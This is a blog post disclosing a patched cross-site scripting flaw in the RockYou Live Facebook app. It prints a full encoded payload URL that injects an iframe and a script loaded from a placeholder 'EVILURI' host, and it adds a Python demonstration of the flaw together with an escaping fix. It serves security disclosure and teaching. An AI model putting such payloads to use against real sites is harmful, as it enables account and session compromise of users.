Posted by theharmonyguy in FAXX Hacks | 1 comment
FAXX Hack: RockYou Live
Facebook Verified Application
Current Monthly Active Users: 9,767,698
Current Rank on Application Leaderboard: 17
Application Developer: RockYou!
Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.
Vulnerability Status: Patched
Capable of Clickjacking Install: No
Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E
Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.
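To show the mechanism behind the `msg` injection above from the fixing side, here is an added example (not RockYou's code): a constructed template that reflects `msg` raw into an attribute, the same template with HTML escaping, and a check that reports which elements a value manages to inject. The template, the `EVILURI` placeholder and the sample value are assumptions, not the application's real markup.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed stand-in for a page fragment that reflects the `msg` query
# parameter into an attribute. The real RockYou markup was not published.
TEMPLATE = '<input type="hidden" name="msg" value="{msg}"/>'

# Constructed sample in the same shape as the post's payload: one layer of
# URL encoding, decoding to a quote that closes the attribute, then a new
# fb:iframe element. EVILURI is a placeholder, as in the original post.
RAW_MSG = "%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E"

TAG_RE = re.compile(r"<([A-Za-z][\w:-]*)")


def decode_query_value(raw):
    """Decode a query value once, as a server reading $_GET would."""
    return unquote_plus(raw)


def render_vulnerable(msg):
    """Interpolate the value with no output encoding (the flaw)."""
    return TEMPLATE.format(msg=msg)


def render_fixed(msg):
    """Escape <, >, &, " and ' so the value cannot leave the attribute."""
    return TEMPLATE.format(msg=html.escape(msg, quote=True))


def tag_names(markup):
    """Names of every start tag present in the markup."""
    return TAG_RE.findall(markup)


def injected_tags(render, msg):
    """Tags in the rendered output that the template itself did not contain."""
    baseline = set(tag_names(render("")))
    return [t for t in tag_names(render(msg)) if t not in baseline]


if __name__ == "__main__":
    msg = decode_query_value(RAW_MSG)
    print("decoded msg:   ", msg)
    print("vulnerable adds:", injected_tags(render_vulnerable, msg))
    print("fixed adds:     ", injected_tags(render_fixed, msg))
```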
By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.
Nice… :)